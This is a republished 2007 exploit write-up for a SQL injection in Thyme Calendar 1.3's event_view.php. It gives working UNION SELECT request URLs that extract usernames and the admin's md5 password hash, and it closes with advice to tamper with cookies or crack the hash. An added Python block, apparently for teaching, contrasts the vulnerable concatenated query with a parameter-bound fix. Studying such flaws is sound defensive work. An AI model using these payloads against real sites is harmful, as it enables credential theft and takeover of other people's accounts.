
Thyme Calendar 1.3 Remote SQL Injection Vulnerability

11 May 2007 00:00:00
Reported by Root
Type: seebug
Source: www.seebug.org

Thyme Calendar 1.3 Remote SQL Injection Vulnerability allows execution of custom SQL query by exploiting the 'eid' field in event_view.ph

Code

                 ##################################################
                 ## Thyme Calendar 1.3 SQL Vulnerability Exploit ##
                 ##                  by Warlord                  ##
                 ##################################################
                 ##              codehook.110mb.com              ##
                 ##################################################

-------------------------------------------------------------------
OVERVIEW AND DEFINITION
-------------------------------------------------------------------

A vulnerability exists in Thyme Calendar 1.3 (and possibly lower versions)
which allows execution of a custom SQL query.

The vulnerability exists in event_view.php, because the 'eid' field is not
properly validated. An attacker could exploit the vulnerability with the
following request:


http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT userid FROM thyme_Users


Where 'sitename' is the name of the site, and 'thyme_directory' is the
directory in which Thyme is located.

-------------------------------------------------------------------
SQL QUERY
-------------------------------------------------------------------

The SQL query originally looks like this:


SELECT id FROM thyme_Attachments WHERE eid = 34


But by changing the 'eid' field we get a query that looks like this:


SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM thyme_Users
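
Added example, not part of the original advisory and not Thyme's own code: the
concatenated query described above next to a validated, parameter-bound version.
It assumes an in-memory sqlite3 database as a stand-in for Thyme's database; the
table contents and the function names are constructed for illustration.

```python
import sqlite3

# The 'eid' value quoted in the advisory.
PAYLOAD = "34 UNION SELECT userid FROM thyme_Users"

def make_db():
    """Constructed stand-in for the two tables the advisory names."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE thyme_Attachments (id INTEGER, eid INTEGER);
        CREATE TABLE thyme_Users (userid TEXT, pass TEXT);
        INSERT INTO thyme_Attachments VALUES (7, 34);
        INSERT INTO thyme_Users VALUES ('admin', 'constructed-hash');
    """)
    return db

def attachments_concat(db, eid):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT id FROM thyme_Attachments WHERE eid = " + eid
    return [row[0] for row in db.execute(sql)]

def attachments_bound(db, eid):
    # Hardened: accept only a short unsigned decimal integer, then pass it
    # as a bound parameter so it can never change the statement's shape.
    if not (eid.isascii() and eid.isdigit() and len(eid) <= 9):
        raise ValueError("eid must be a decimal integer")
    sql = "SELECT id FROM thyme_Attachments WHERE eid = ?"
    return [row[0] for row in db.execute(sql, (int(eid),))]

if __name__ == "__main__":
    db = make_db()
    print("concat, eid=34      :", attachments_concat(db, "34"))
    print("concat, advisory eid:", attachments_concat(db, PAYLOAD))
    print("bound,  eid=34      :", attachments_bound(db, "34"))
    try:
        attachments_bound(db, PAYLOAD)
    except ValueError as exc:
        print("bound,  advisory eid: rejected,", exc)
```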

-------------------------------------------------------------------
RESULT OF NEW QUERY
-------------------------------------------------------------------

The result is that the query sends back all the userid's (actually
usernames) from the database instead of the 'id' from thyme_Attachments.
You will be able to grab the userid's from the HTML source by searching for
'aid=' as this is where the attachment id is supposed to go. For example:

http://sitename/thyme_directory/download_attachment.php?aid=admin

-------------------------------------------------------------------
GETTING PASSWORDS
-------------------------------------------------------------------

And the password (md5'd) can be obtained in the same fashion:

http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT pass FROM thyme_Users WHERE username = "admin"

In the HTML source:

http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a

-------------------------------------------------------------------
HOW TO EXPLOIT
-------------------------------------------------------------------

Cookies should be modifiable. If not, crack the md5!

http://md5.rednoize.com
                              
